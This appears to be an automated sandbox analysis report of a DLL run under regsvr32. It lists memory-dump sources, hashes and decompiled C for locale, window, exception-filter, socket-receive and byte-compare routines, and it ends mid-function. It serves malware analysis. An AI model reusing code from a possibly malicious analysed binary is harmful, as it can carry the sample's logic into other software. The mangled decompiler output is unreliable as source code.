                                                                                                        • Source File: 00000002.00000002.303760085.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.303755479.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303779838.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303789852.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303808490.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303813956.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303817812.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: State$LongMessageSendWindow
                                                                                                        • String ID:
                                                                                                        • API String ID: 1063413437-0
                                                                                                        • Opcode ID: fb4c216abc4c33cb282e021b119ac4542c3b2f6db45558139360cfc9261ccdec
                                                                                                        • Instruction ID: de176050283294f5fba88da379e0eecc3ccd74c62a8982f524273e82d2dc9d2d
                                                                                                        • Opcode Fuzzy Hash: fb4c216abc4c33cb282e021b119ac4542c3b2f6db45558139360cfc9261ccdec
                                                                                                        • Instruction Fuzzy Hash: 3BF0827B38025B26FA20B2748C41FBA9154CF86BD0F120538FA42EA5DECF91D8022271
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 88%
                                                                                                        			E10027704() {
                                                                                                        				signed int _v8;
                                                                                                        				char _v16;
                                                                                                        				void* __esi;
                                                                                                        				signed int _t8;
                                                                                                        				intOrPtr* _t15;
                                                                                                        				intOrPtr _t16;
                                                                                                        				char _t20;
                                                                                                        				intOrPtr _t22;
                                                                                                        				intOrPtr _t23;
                                                                                                        				signed int _t24;
                                                                                                        				int _t25;
                                                                                                        				signed int _t27;
                                                                                                        
                                                                                                        				_t8 =  *0x10057a08; // 0xe6b5ff6d
                                                                                                        				_v8 = _t8 ^ _t27;
                                                                                                        				_t24 = 0;
                                                                                                        				if(GetLocaleInfoA(GetThreadLocale(), 0x1004,  &_v16, 7) == 0) {
                                                                                                        					L4:
                                                                                                        					_t25 = GetACP();
                                                                                                        				} else {
                                                                                                        					_t20 = _v16;
                                                                                                        					_t15 =  &_v16;
                                                                                                        					if(_t20 == 0) {
                                                                                                        						goto L4;
                                                                                                        					} else {
                                                                                                        						do {
                                                                                                        							_t15 = _t15 + 1;
                                                                                                        							_t24 = _t24 * 0xa + _t20 - 0x30;
                                                                                                        							_t20 =  *_t15;
                                                                                                        						} while (_t20 != 0);
                                                                                                        						if(_t24 == 0) {
                                                                                                        							goto L4;
                                                                                                        						}
                                                                                                        					}
                                                                                                        				}
                                                                                                        				return E100167D5(_t25, _t16, _v8 ^ _t27, _t22, _t23, _t25);
                                                                                                        			}















                                                                                                        0x1002770a
                                                                                                        0x10027711
                                                                                                        0x10027715
                                                                                                        0x10027731
                                                                                                        0x10027752
                                                                                                        0x10027758
                                                                                                        0x10027733
                                                                                                        0x10027733
                                                                                                        0x10027738
                                                                                                        0x1002773b
                                                                                                        0x00000000
                                                                                                        0x1002773d
                                                                                                        0x1002773d
                                                                                                        0x10027743
                                                                                                        0x10027744
                                                                                                        0x10027748
                                                                                                        0x1002774a
                                                                                                        0x10027750
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10027750
                                                                                                        0x1002773b
                                                                                                        0x10027768

                                                                                                        APIs
                                                                                                        • GetThreadLocale.KERNEL32 ref: 10027717
                                                                                                        • GetLocaleInfoA.KERNEL32(00000000,00001004,?,00000007), ref: 10027729
                                                                                                        • GetACP.KERNEL32 ref: 10027752
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.303760085.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.303755479.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303779838.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303789852.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303808490.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303813956.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303817812.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Locale$InfoThread
                                                                                                        • String ID:
                                                                                                        • API String ID: 4232894706-0
                                                                                                        • Opcode ID: 2cdb2551da010e6fdb5870f0ade684243d2ea15601f9ad5558c20012d78a2078
                                                                                                        • Instruction ID: 66289914fabe9bf2d1b1abcf1e27b8b8f35a8bed3fb6bd80cc0c1702fed1c004
                                                                                                        • Opcode Fuzzy Hash: 2cdb2551da010e6fdb5870f0ade684243d2ea15601f9ad5558c20012d78a2078
                                                                                                        • Instruction Fuzzy Hash: DCF0C231E042785BE701DB7598556EF77E4FF04B90B9101ADEC86E7280D720AE0987C4
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 79%
                                                                                                        			E1000D804(struct HWND__* _a4, signed int _a8) {
                                                                                                        				struct _WINDOWPLACEMENT _v48;
                                                                                                        				int _t16;
                                                                                                        
                                                                                                        				if(E1000D6C3() == 0) {
                                                                                                        					if((_a8 & 0x00000003) == 0) {
                                                                                                        						if(IsIconic(_a4) == 0) {
                                                                                                        							_t16 = GetWindowRect(_a4,  &(_v48.rcNormalPosition));
                                                                                                        						} else {
                                                                                                        							_t16 = GetWindowPlacement(_a4,  &_v48);
                                                                                                        						}
                                                                                                        						if(_t16 == 0) {
                                                                                                        							return 0;
                                                                                                        						} else {
                                                                                                        							return E1000D7B8( &(_v48.rcNormalPosition), _a8);
                                                                                                        						}
                                                                                                        					}
                                                                                                        					return 0x12340042;
                                                                                                        				}
                                                                                                        				return  *0x1005a754(_a4, _a8);
                                                                                                        			}





                                                                                                        0x1000d811
                                                                                                        0x1000d825
                                                                                                        0x1000d839
                                                                                                        0x1000d851
                                                                                                        0x1000d83b
                                                                                                        0x1000d842
                                                                                                        0x1000d842
                                                                                                        0x1000d859
                                                                                                        0x00000000
                                                                                                        0x1000d85b
                                                                                                        0x00000000
                                                                                                        0x1000d862
                                                                                                        0x1000d859
                                                                                                        0x00000000
                                                                                                        0x1000d827
                                                                                                        0x00000000

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.303760085.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.303755479.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303779838.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303789852.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303808490.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303813956.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303817812.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 0e9ea1c9e954d40bf421bd01099b490e8a12a05a626fb39da3dad4e443b19b0f
                                                                                                        • Instruction ID: 387a2a710324106c5c2e9ba8f0dac284bfb83953cc403e56f04fca2c0ded1ab9
                                                                                                        • Opcode Fuzzy Hash: 0e9ea1c9e954d40bf421bd01099b490e8a12a05a626fb39da3dad4e443b19b0f
                                                                                                        • Instruction Fuzzy Hash: 71F0C935504209AAFF01EF61CC489AE7BA9EF043D4B10C026FC19D5068DB35DA559BA1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 37%
                                                                                                        			E1001FC43(void* __eax, void* __ebx, void* __edx) {
                                                                                                        				_Unknown_base(*)()* _t8;
                                                                                                        
                                                                                                        				 *((intOrPtr*)(__edx + __ebx - 1)) =  *((intOrPtr*)(__edx + __ebx - 1)) + __edx;
                                                                                                        				_t8 = SetUnhandledExceptionFilter(E1001BD6F());
                                                                                                        				 *0x1005b670 = 0;
                                                                                                        				return _t8;
                                                                                                        			}




                                                                                                        0x1001fc48
                                                                                                        0x1001fc58
                                                                                                        0x1001fc5e
                                                                                                        0x1001fc65

                                                                                                        APIs
                                                                                                        • __decode_pointer.LIBCMT ref: 1001FC51
                                                                                                          • Part of subcall function 1001BD6F: TlsGetValue.KERNEL32(?,1001C0FD,00000000,00000000,10017A84,00000000,?,?,00000001,?,?,10017AE8,00000001,?,?,1002F840), ref: 1001BD7C
                                                                                                          • Part of subcall function 1001BD6F: TlsGetValue.KERNEL32(00000006,?,1001C0FD,00000000,00000000,10017A84,00000000,?,?,00000001,?,?,10017AE8,00000001), ref: 1001BD93
                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 1001FC58
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.303760085.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.303755479.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303779838.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303789852.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303808490.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303813956.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303817812.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Value$ExceptionFilterUnhandled__decode_pointer
                                                                                                        • String ID:
                                                                                                        • API String ID: 1958600898-0
                                                                                                        • Opcode ID: c0118062e478c14860ac704cd26963d59993939b078219122e56b5b05da27951
                                                                                                        • Instruction ID: 8c383471f53841a55e0fcdb182c1f4564aa38491823c170ddba15b1e5c66fe32
                                                                                                        • Opcode Fuzzy Hash: c0118062e478c14860ac704cd26963d59993939b078219122e56b5b05da27951
                                                                                                        • Instruction Fuzzy Hash: E0C04C59818ED49AE715DF745C9D70D7F14E712508FD40589D480851A2DE6CA049C931
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 58%
                                                                                                        			E100012D0(intOrPtr __ecx, void* _a4) {
                                                                                                        				char _v8;
                                                                                                        				signed int _v12;
                                                                                                        				char _v20;
                                                                                                        				void _v1044;
                                                                                                        				intOrPtr _v1048;
                                                                                                        				void* __edi;
                                                                                                        				void* __esi;
                                                                                                        				signed int _t19;
                                                                                                        				intOrPtr _t26;
                                                                                                        				signed int _t41;
                                                                                                        
                                                                                                        				_t19 =  *0x10057a08; // 0xe6b5ff6d
                                                                                                        				_v12 = _t19 ^ _t41;
                                                                                                        				_v1048 = __ecx;
                                                                                                        				_v20 = 0;
                                                                                                        				_v8 = 0x10;
                                                                                                        				__imp__#17( &_v1044, 0x400, 0, _v1048 + 0x14,  &_v8);
                                                                                                        				_v20 = _v1048;
                                                                                                        				 *((char*)(_t41 + _v20 - 0x410)) = 0;
                                                                                                        				memcpy(_a4,  &_v1044, 0x101 << 2);
                                                                                                        				return E100167D5(_a4, _t26, _v12 ^ _t41, _v20,  &_v1044 + 0x202,  &_v1044,  *((intOrPtr*)(_v1048 + 0x24)));
                                                                                                        			}













                                                                                                        0x100012d9
                                                                                                        0x100012e0
                                                                                                        0x100012e5
                                                                                                        0x100012eb
                                                                                                        0x100012f2
                                                                                                        0x1000131f
                                                                                                        0x10001325
                                                                                                        0x1000132b
                                                                                                        0x10001341
                                                                                                        0x10001355

                                                                                                        APIs
                                                                                                        • recvfrom.WS2_32(?,?,00000400,00000000,?,00000010), ref: 1000131F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.303760085.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.303755479.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303779838.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303789852.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303808490.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303813956.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303817812.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: recvfrom
                                                                                                        • String ID:
                                                                                                        • API String ID: 846543921-0
                                                                                                        • Opcode ID: e3286800183b2fb084681865d01d3168ae5294563589533788e7953d9f8637e2
                                                                                                        • Instruction ID: bec5cb5057db5f544406cf49396100538fbf28fc5aa5dd8def6f1e45c3881569
                                                                                                        • Opcode Fuzzy Hash: e3286800183b2fb084681865d01d3168ae5294563589533788e7953d9f8637e2
                                                                                                        • Instruction Fuzzy Hash: 830112F5A0011C9FDB14CF58CD54BDEB7B8FF88314F4045A9E609A7241D7B4AA84CBA5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 100%
                                                                                                        			E1001929D(void* __eax, void* __ecx) {
                                                                                                        				void* _t196;
                                                                                                        				signed int _t197;
                                                                                                        				void* _t200;
                                                                                                        				signed char _t206;
                                                                                                        				signed char _t207;
                                                                                                        				signed char _t208;
                                                                                                        				signed char _t210;
                                                                                                        				signed char _t211;
                                                                                                        				signed int _t216;
                                                                                                        				signed int _t316;
                                                                                                        				void* _t319;
                                                                                                        				void* _t321;
                                                                                                        				void* _t323;
                                                                                                        				void* _t325;
                                                                                                        				void* _t327;
                                                                                                        				void* _t330;
                                                                                                        				void* _t332;
                                                                                                        				void* _t334;
                                                                                                        				void* _t337;
                                                                                                        				void* _t339;
                                                                                                        				void* _t341;
                                                                                                        				void* _t344;
                                                                                                        				void* _t346;
                                                                                                        				void* _t348;
                                                                                                        				void* _t351;
                                                                                                        				void* _t353;
                                                                                                        				void* _t355;
                                                                                                        				void* _t358;
                                                                                                        				void* _t360;
                                                                                                        				void* _t362;
                                                                                                        
                                                                                                        				_t200 = __ecx;
                                                                                                        				_t196 = __eax;
                                                                                                        				if( *((intOrPtr*)(__eax - 0x1f)) ==  *((intOrPtr*)(__ecx - 0x1f))) {
                                                                                                        					_t316 = 0;
                                                                                                        					L17:
                                                                                                        					if(_t316 != 0) {
                                                                                                        						goto L1;
                                                                                                        					}
                                                                                                        					_t206 =  *(_t196 - 0x1b);
                                                                                                        					if(_t206 ==  *(_t200 - 0x1b)) {
                                                                                                        						_t316 = 0;
                                                                                                        						L28:
                                                                                                        						if(_t316 != 0) {
                                                                                                        							goto L1;
                                                                                                        						}
                                                                                                        						_t207 =  *(_t196 - 0x17);
                                                                                                        						if(_t207 ==  *(_t200 - 0x17)) {
                                                                                                        							_t316 = 0;
                                                                                                        							L39:
                                                                                                        							if(_t316 != 0) {
                                                                                                        								goto L1;
                                                                                                        							}
                                                                                                        							_t208 =  *(_t196 - 0x13);
                                                                                                        							if(_t208 ==  *(_t200 - 0x13)) {
                                                                                                        								_t316 = 0;
                                                                                                        								L50:
                                                                                                        								if(_t316 != 0) {
                                                                                                        									goto L1;
                                                                                                        								}
                                                                                                        								if( *(_t196 - 0xf) ==  *(_t200 - 0xf)) {
                                                                                                        									_t316 = 0;
                                                                                                        									L61:
                                                                                                        									if(_t316 != 0) {
                                                                                                        										goto L1;
                                                                                                        									}
                                                                                                        									_t210 =  *(_t196 - 0xb);
                                                                                                        									if(_t210 ==  *(_t200 - 0xb)) {
                                                                                                        										_t316 = 0;
                                                                                                        										L72:
                                                                                                        										if(_t316 != 0) {
                                                                                                        											goto L1;
                                                                                                        										}
                                                                                                        										_t211 =  *(_t196 - 7);
                                                                                                        										if(_t211 ==  *(_t200 - 7)) {
                                                                                                        											_t316 = 0;
                                                                                                        											L83:
                                                                                                        											if(_t316 != 0) {
                                                                                                        												goto L1;
                                                                                                        											}
                                                                                                        											_t319 = ( *(_t196 - 3) & 0x000000ff) - ( *(_t200 - 3) & 0x000000ff);
                                                                                                        											if(_t319 == 0) {
                                                                                                        												L5:
                                                                                                        												_t321 = ( *(_t196 - 2) & 0x000000ff) - ( *(_t200 - 2) & 0x000000ff);
                                                                                                        												if(_t321 == 0) {
                                                                                                        													L3:
                                                                                                        													_t197 = ( *(_t196 - 1) & 0x000000ff) - ( *(_t200 - 1) & 0x000000ff);
                                                                                                        													if(_t197 != 0) {
                                                                                                        														_t197 = (0 | _t197 > 0x00000000) + (0 | _t197 > 0x00000000) - 1;
                                                                                                        													}
                                                                                                        													L2:
                                                                                                        													return _t197;
                                                                                                        												}
                                                                                                        												_t216 = (0 | _t321 > 0x00000000) + (0 | _t321 > 0x00000000) - 1;
                                                                                                        												if(_t216 != 0) {
                                                                                                        													L86:
                                                                                                        													_t197 = _t216;
                                                                                                        													goto L2;
                                                                                                        												} else {
                                                                                                        													goto L3;
                                                                                                        												}
                                                                                                        											}
                                                                                                        											_t216 = (0 | _t319 > 0x00000000) + (0 | _t319 > 0x00000000) - 1;
                                                                                                        											if(_t216 == 0) {
                                                                                                        												goto L5;
                                                                                                        											}
                                                                                                        											goto L86;
                                                                                                        										}
                                                                                                        										_t323 = (_t211 & 0x000000ff) - ( *(_t200 - 7) & 0x000000ff);
                                                                                                        										if(_t323 == 0) {
                                                                                                        											L76:
                                                                                                        											_t325 = ( *(_t196 - 6) & 0x000000ff) - ( *(_t200 - 6) & 0x000000ff);
                                                                                                        											if(_t325 == 0) {
                                                                                                        												L78:
                                                                                                        												_t327 = ( *(_t196 - 5) & 0x000000ff) - ( *(_t200 - 5) & 0x000000ff);
                                                                                                        												if(_t327 == 0) {
                                                                                                        													L80:
                                                                                                        													_t316 = ( *(_t196 - 4) & 0x000000ff) - ( *(_t200 - 4) & 0x000000ff);
                                                                                                        													if(_t316 != 0) {
                                                                                                        														_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
                                                                                                        													}
                                                                                                        													goto L83;
                                                                                                        												}
                                                                                                        												_t316 = (0 | _t327 > 0x00000000) + (0 | _t327 > 0x00000000) - 1;
                                                                                                        												if(_t316 != 0) {
                                                                                                        													goto L1;
                                                                                                        												}
                                                                                                        												goto L80;
                                                                                                        											}
                                                                                                        											_t316 = (0 | _t325 > 0x00000000) + (0 | _t325 > 0x00000000) - 1;
                                                                                                        											if(_t316 != 0) {
                                                                                                        												goto L1;
                                                                                                        											}
                                                                                                        											goto L78;
                                                                                                        										}
                                                                                                        										_t316 = (0 | _t323 > 0x00000000) + (0 | _t323 > 0x00000000) - 1;
                                                                                                        										if(_t316 != 0) {
                                                                                                        											goto L1;
                                                                                                        										}
                                                                                                        										goto L76;
                                                                                                        									}
                                                                                                        									_t330 = (_t210 & 0x000000ff) - ( *(_t200 - 0xb) & 0x000000ff);
                                                                                                        									if(_t330 == 0) {
                                                                                                        										L65:
                                                                                                        										_t332 = ( *(_t196 - 0xa) & 0x000000ff) - ( *(_t200 - 0xa) & 0x000000ff);
                                                                                                        										if(_t332 == 0) {
                                                                                                        											L67:
                                                                                                        											_t334 = ( *(_t196 - 9) & 0x000000ff) - ( *(_t200 - 9) & 0x000000ff);
                                                                                                        											if(_t334 == 0) {
                                                                                                        												L69:
                                                                                                        												_t316 = ( *(_t196 - 8) & 0x000000ff) - ( *(_t200 - 8) & 0x000000ff);
                                                                                                        												if(_t316 != 0) {
                                                                                                        													_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
                                                                                                        												}
                                                                                                        												goto L72;
                                                                                                        											}
                                                                                                        											_t316 = (0 | _t334 > 0x00000000) + (0 | _t334 > 0x00000000) - 1;
                                                                                                        											if(_t316 != 0) {
                                                                                                        												goto L1;
                                                                                                        											}
                                                                                                        											goto L69;
                                                                                                        										}
                                                                                                        										_t316 = (0 | _t332 > 0x00000000) + (0 | _t332 > 0x00000000) - 1;
                                                                                                        										if(_t316 != 0) {
                                                                                                        											goto L1;
                                                                                                        										}
                                                                                                        										goto L67;
                                                                                                        									}
                                                                                                        									_t316 = (0 | _t330 > 0x00000000) + (0 | _t330 > 0x00000000) - 1;
                                                                                                        									if(_t316 != 0) {
                                                                                                        										goto L1;
                                                                                                        									}
                                                                                                        									goto L65;
                                                                                                        								}
                                                                                                        								_t337 = ( *(_t196 - 0xf) & 0x000000ff) - ( *(_t200 - 0xf) & 0x000000ff);
                                                                                                        								if(_t337 == 0) {
                                                                                                        									L54:
                                                                                                        									_t339 = ( *(_t196 - 0xe) & 0x000000ff) - ( *(_t200 - 0xe) & 0x000000ff);
                                                                                                        									if(_t339 == 0) {
                                                                                                        										L56:
                                                                                                        										_t341 = ( *(_t196 - 0xd) & 0x000000ff) - ( *(_t200 - 0xd) & 0x000000ff);
                                                                                                        										if(_t341 == 0) {
                                                                                                        											L58:
                                                                                                        											_t316 = ( *(_t196 - 0xc) & 0x000000ff) - ( *(_t200 - 0xc) & 0x000000ff);
                                                                                                        											if(_t316 != 0) {
                                                                                                        												_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
                                                                                                        											}
                                                                                                        											goto L61;
                                                                                                        										}
                                                                                                        										_t316 = (0 | _t341 > 0x00000000) + (0 | _t341 > 0x00000000) - 1;
                                                                                                        										if(_t316 != 0) {
                                                                                                        											goto L1;
                                                                                                        										}
                                                                                                        										goto L58;
                                                                                                        									}
                                                                                                        									_t316 = (0 | _t339 > 0x00000000) + (0 | _t339 > 0x00000000) - 1;
                                                                                                        									if(_t316 != 0) {
                                                                                                        										goto L1;
                                                                                                        									}
                                                                                                        									goto L56;
                                                                                                        								}
                                                                                                        								_t316 = (0 | _t337 > 0x00000000) + (0 | _t337 > 0x00000000) - 1;
                                                                                                        								if(_t316 != 0) {
                                                                                                        									goto L1;
                                                                                                        								}
                                                                                                        								goto L54;
                                                                                                        							}
                                                                                                        							_t344 = (_t208 & 0x000000ff) - ( *(_t200 - 0x13) & 0x000000ff);
                                                                                                        							if(_t344 == 0) {
                                                                                                        								L43:
                                                                                                        								_t346 = ( *(_t196 - 0x12) & 0x000000ff) - ( *(_t200 - 0x12) & 0x000000ff);
                                                                                                        								if(_t346 == 0) {
                                                                                                        									L45:
                                                                                                        									_t348 = ( *(_t196 - 0x11) & 0x000000ff) - ( *(_t200 - 0x11) & 0x000000ff);
                                                                                                        									if(_t348 == 0) {
                                                                                                        										L47:
                                                                                                        										_t316 = ( *(_t196 - 0x10) & 0x000000ff) - ( *(_t200 - 0x10) & 0x000000ff);
                                                                                                        										if(_t316 != 0) {
                                                                                                        											_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
                                                                                                        										}
                                                                                                        										goto L50;
                                                                                                        									}
                                                                                                        									_t316 = (0 | _t348 > 0x00000000) + (0 | _t348 > 0x00000000) - 1;
                                                                                                        									if(_t316 != 0) {
                                                                                                        										goto L1;
                                                                                                        									}
                                                                                                        									goto L47;
                                                                                                        								}
                                                                                                        								_t316 = (0 | _t346 > 0x00000000) + (0 | _t346 > 0x00000000) - 1;
                                                                                                        								if(_t316 != 0) {
                                                                                                        									goto L1;
                                                                                                        								}
                                                                                                        								goto L45;
                                                                                                        							}
                                                                                                        							_t316 = (0 | _t344 > 0x00000000) + (0 | _t344 > 0x00000000) - 1;
                                                                                                        							if(_t316 != 0) {
                                                                                                        								goto L1;
                                                                                                        							}
                                                                                                        							goto L43;
                                                                                                        						}
                                                                                                        						_t351 = (_t207 & 0x000000ff) - ( *(_t200 - 0x17) & 0x000000ff);
                                                                                                        						if(_t351 == 0) {
                                                                                                        							L32:
                                                                                                        							_t353 = ( *(_t196 - 0x16) & 0x000000ff) - ( *(_t200 - 0x16) & 0x000000ff);
                                                                                                        							if(_t353 == 0) {
                                                                                                        								L34:
                                                                                                        								_t355 = ( *(_t196 - 0x15) & 0x000000ff) - ( *(_t200 - 0x15) & 0x000000ff);
                                                                                                        								if(_t355 == 0) {
                                                                                                        									L36:
                                                                                                        									_t316 = ( *(_t196 - 0x14) & 0x000000ff) - ( *(_t200 - 0x14) & 0x000000ff);
                                                                                                        									if(_t316 != 0) {
                                                                                                        										_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
                                                                                                        									}
                                                                                                        									goto L39;
                                                                                                        								}
                                                                                                        								_t316 = (0 | _t355 > 0x00000000) + (0 | _t355 > 0x00000000) - 1;
                                                                                                        								if(_t316 != 0) {
                                                                                                        									goto L1;
                                                                                                        								}
                                                                                                        								goto L36;
                                                                                                        							}
                                                                                                        							_t316 = (0 | _t353 > 0x00000000) + (0 | _t353 > 0x00000000) - 1;
                                                                                                        							if(_t316 != 0) {
                                                                                                        								goto L1;
                                                                                                        							}
                                                                                                        							goto L34;
                                                                                                        						}
                                                                                                        						_t316 = (0 | _t351 > 0x00000000) + (0 | _t351 > 0x00000000) - 1;
                                                                                                        						if(_t316 != 0) {
                                                                                                        							goto L1;
                                                                                                        						}
                                                                                                        						goto L32;
                                                                                                        					}
                                                                                                        					_t358 = (_t206 & 0x000000ff) - ( *(_t200 - 0x1b) & 0x000000ff);
                                                                                                        					if(_t358 == 0) {
                                                                                                        						L21:
                                                                                                        						_t360 = ( *(_t196 - 0x1a) & 0x000000ff) - ( *(_t200 - 0x1a) & 0x000000ff);
                                                                                                        						if(_t360 == 0) {
                                                                                                        							L23:
                                                                                                        							_t362 = ( *(_t196 - 0x19) & 0x000000ff) - ( *(_t200 - 0x19) & 0x000000ff);
                                                                                                        							if(_t362 == 0) {
                                                                                                        								L25:
                                                                                                        								_t316 = ( *(_t196 - 0x18) & 0x000000ff) - ( *(_t200 - 0x18) & 0x000000ff);
                                                                                                        								if(_t316 != 0) {
                                                                                                        									_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
                                                                                                        								}
                                                                                                        								goto L28;
                                                                                                        							}
                                                                                                        							_t316 = (0 | _t362 > 0x00000000) + (0 | _t362 > 0x00000000) - 1;
                                                                                                        							if(_t316 != 0) {
                                                                                                        								goto L1;
                                                                                                        							}
                                                                                                        							goto L25;
                                                                                                        						}
                                                                                                        						_t316 = (0 | _t360 > 0x00000000) + (0 | _t360 > 0x00000000) - 1;
                                                                                                        						if(_t316 != 0) {
                                                                                                        							goto L1;
                                                                                                        						}
                                                                                                        						goto L23;
                                                                                                        					}
                                                                                                        					_t316 = (0 | _t358 > 0x00000000) + (0 | _t358 > 0x00000000) - 1;
                                                                                                        					if(_t316 != 0) {
                                                                                                        						goto L1;
                                                                                                        					}
                                                                                                        					goto L21;
                                                                                                        				} else {
                                                                                                        					__edx =  *(__ecx - 0x1f) & 0x000000ff;
                                                                                                        					__esi =  *(__eax - 0x1f) & 0x000000ff;
                                                                                                        					__esi = ( *(__eax - 0x1f) & 0x000000ff) - ( *(__ecx - 0x1f) & 0x000000ff);
                                                                                                        					if(__esi == 0) {
                                                                                                        						L10:
                                                                                                        						__esi =  *(__eax - 0x1e) & 0x000000ff;
                                                                                                        						__edx =  *(__ecx - 0x1e) & 0x000000ff;
                                                                                                        						__esi = ( *(__eax - 0x1e) & 0x000000ff) - ( *(__ecx - 0x1e) & 0x000000ff);
                                                                                                        						if(__esi == 0) {
                                                                                                        							L12:
                                                                                                        							__esi =  *(__eax - 0x1d) & 0x000000ff;
                                                                                                        							__edx =  *(__ecx - 0x1d) & 0x000000ff;
                                                                                                        							__esi = ( *(__eax - 0x1d) & 0x000000ff) - ( *(__ecx - 0x1d) & 0x000000ff);
                                                                                                        							if(__esi == 0) {
                                                                                                        								L14:
                                                                                                        								__esi =  *(__eax - 0x1c) & 0x000000ff;
                                                                                                        								__edx =  *(__ecx - 0x1c) & 0x000000ff;
                                                                                                        								__esi = ( *(__eax - 0x1c) & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
                                                                                                        								if(__esi != 0) {
                                                                                                        									0 = 0 | __esi > 0x00000000;
                                                                                                        									__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                        									__esi = (__esi > 0) + (__esi > 0) - 1;
                                                                                                        								}
                                                                                                        								goto L17;
                                                                                                        							}
                                                                                                        							0 = 0 | __esi > 0x00000000;
                                                                                                        							__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                        							__esi = __edx;
                                                                                                        							if(__edx != 0) {
                                                                                                        								goto L1;
                                                                                                        							}
                                                                                                        							goto L14;
                                                                                                        						}
                                                                                                        						0 = 0 | __esi > 0x00000000;
                                                                                                        						__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                        						__esi = __edx;
                                                                                                        						if(__edx != 0) {
                                                                                                        							goto L1;
                                                                                                        						}
                                                                                                        						goto L12;
                                                                                                        					}
                                                                                                        					0 = 0 | __esi > 0x00000000;
